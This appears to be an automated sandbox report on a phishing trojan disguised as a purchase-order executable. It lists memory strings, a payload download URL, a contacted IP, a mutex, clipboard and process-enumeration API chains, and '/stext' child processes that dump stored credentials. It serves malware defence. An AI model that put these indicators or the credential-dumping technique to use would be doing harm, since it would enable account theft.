            Source: Purchase-Order27112024.scr.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Purchase-Order27112024.scr.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063A8000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4580580413.0000000008020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49755 version: TLS 1.2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_0040987A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004098E2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_00406DFC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00406E9F
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004068B5
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Purchase-Order27112024.scr.exe
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00401806 NtdllDefWindowProc_W,6_2_00401806
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004018C0 NtdllDefWindowProc_W,6_2_004018C0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004016FD NtdllDefWindowProc_A,7_2_004016FD
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004017B7 NtdllDefWindowProc_A,7_2_004017B7
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00402CAC NtdllDefWindowProc_A,8_2_00402CAC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00402D66 NtdllDefWindowProc_A,8_2_00402D66
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00404B6E0_2_00404B6E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_0040659D0_2_0040659D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_00404B6E2_2_00404B6E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_0040659D2_2_0040659D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_370171942_2_37017194
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_3700B5C12_2_3700B5C1
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044B0406_2_0044B040
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0043610D6_2_0043610D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004473106_2_00447310
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044A4906_2_0044A490
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040755A6_2_0040755A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0043C5606_2_0043C560
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044B6106_2_0044B610
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044D6C06_2_0044D6C0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004476F06_2_004476F0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044B8706_2_0044B870
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044081D6_2_0044081D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004149576_2_00414957
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004079EE6_2_004079EE
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00407AEB6_2_00407AEB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044AA806_2_0044AA80
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00412AA96_2_00412AA9
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00404B746_2_00404B74
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00404B036_2_00404B03
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044BBD86_2_0044BBD8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00404BE56_2_00404BE5
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00404C766_2_00404C76
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00415CFE6_2_00415CFE
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00416D726_2_00416D72
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00446D306_2_00446D30
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00446D8B6_2_00446D8B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00406E8F6_2_00406E8F
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004050387_2_00405038
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0041208C7_2_0041208C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004050A97_2_004050A9
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0040511A7_2_0040511A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0043C13A7_2_0043C13A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004051AB7_2_004051AB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004493007_2_00449300
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0040D3227_2_0040D322
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0044A4F07_2_0044A4F0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0043A5AB7_2_0043A5AB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004136317_2_00413631
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004466907_2_00446690
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0044A7307_2_0044A730
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004398D87_2_004398D8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004498E07_2_004498E0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0044A8867_2_0044A886
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0043DA097_2_0043DA09
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00438D5E7_2_00438D5E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00449ED07_2_00449ED0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0041FE837_2_0041FE83
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00430F547_2_00430F54
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004050C28_2_004050C2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004014AB8_2_004014AB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004051338_2_00405133
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004051A48_2_004051A4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004012468_2_00401246
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_0040CA468_2_0040CA46
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004052358_2_00405235
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004032C88_2_004032C8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004222D98_2_004222D9
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004016898_2_00401689
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00402F608_2_00402F60
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 00416760 appears 69 times
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: String function: 00402B3A appears 51 times
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580067964.000000000647F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2559567010.00000000369B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2586800551.0000000006459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2559398805.0000000006459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FEB000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2586800551.000000000646D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exeBinary or memory string: OriginalFileName vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exeBinary or memory string: OriginalFilename vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
            Source: Purchase-Order27112024.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/14@4/3
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,6_2_004182CE
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,8_2_00410DE1
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,6_2_00413D4C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,6_2_0040B58D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile created: C:\Users\user\AppData\Local\googlyJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B4UZRV
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsa77F2.tmpJump to behavior
            Source: Purchase-Order27112024.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587394804.0000000002765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile read: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-33221
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"Jump to behavior
